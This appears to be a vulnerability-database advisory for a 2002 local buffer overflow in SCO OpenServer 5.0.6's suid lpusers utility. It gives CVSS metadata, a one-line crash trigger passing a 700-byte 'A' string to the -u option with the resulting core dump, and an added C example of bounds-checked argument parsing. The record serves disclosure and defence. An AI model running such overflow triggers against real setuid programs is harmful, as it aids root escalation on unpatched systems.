Vendor: OpenServer 5.0.6
By: SecurityFocus
CVSS: 7.2 (HIGH)
Type: Buffer Overflow
CWE: 120
Product Name: OpenServer 5.0.6
Affected Version From: 5.0.6
Affected Version To: 5.0.6
Patch Exists: YES
Related CWE: N/A
CPE: o:sco:openserver_5.0.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2002

SCO OpenServer 5.0.6 lpusers Buffer Overflow Vulnerability

SCO OpenServer 5.0.6 (and possibly earlier versions) ships with several suid bin executables used in printer administration and related tasks. One of these is lpusers, a component used to set the queue priority of jobs that users submit to the LP print service. 'lpusers' contains a locally exploitable buffer overflow that is triggered when command-line arguments are of excessive length. If properly exploited, this can yield root privilege to the attacker.

Mitigation:

Ensure that all system and software components are kept up to date with the latest security patches and updates.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2557/info

/opt/K/SCO/Unix/5.0.6Ga/usr/lib/lpusers -u `perl -e 'print "A" x 700'`

Memory fault - core dumped
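
The memory fault above follows a 700-byte value passed to -u. The C below is an added illustration, not lpusers source (which the page does not show) and not code from SCO or SecurityFocus: it shows the unchecked-copy pattern behind this class of bug in a comment, and an option parser that rejects an oversized argument instead of copying it. USERLIST_MAX, copy_option_value and parse_u_option are hypothetical names, and the 256-byte limit is an assumption.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define USERLIST_MAX 256 /* assumed size; the real buffer size is not on the page */

/* Unchecked pattern (CWE-120): the caller controls the argument length and
 * nothing compares it with the destination size.
 *     char users[USERLIST_MAX];
 *     strcpy(users, argv[i + 1]);
 */

/* Hardened copy: succeeds only if src fits in dst including the NUL.
 * Returns 0 on success, -1 with errno set; never truncates silently. */
int copy_option_value(char *dst, size_t dstsz, const char *src)
{
    size_t len;
    if (dst == NULL || dstsz == 0 || src == NULL) { errno = EINVAL; return -1; }
    for (len = 0; len < dstsz && src[len] != '\0'; len++)
        ;                                   /* bounded scan, at most dstsz bytes */
    if (len == dstsz) { dst[0] = '\0'; errno = E2BIG; return -1; }
    memcpy(dst, src, len + 1);
    return 0;
}

/* Locate "-u <value>". Returns 0 copied, 1 option absent, -1 rejected. */
int parse_u_option(int argc, char *const argv[], char *dst, size_t dstsz)
{
    int i;
    for (i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-u") == 0) {
            if (i + 1 >= argc) { errno = EINVAL; return -1; }
            return copy_option_value(dst, dstsz, argv[i + 1]);
        }
    }
    return 1;
}

int main(int argc, char *argv[])
{
    char users[USERLIST_MAX];
    int rc = parse_u_option(argc, argv, users, sizeof users);
    if (rc < 0) {
        fprintf(stderr, "demo: -u value missing or too long\n");
        return 2;               /* fail closed before any privileged work */
    }
    if (rc == 0) printf("users: %s\n", users);
    return 0;
}
```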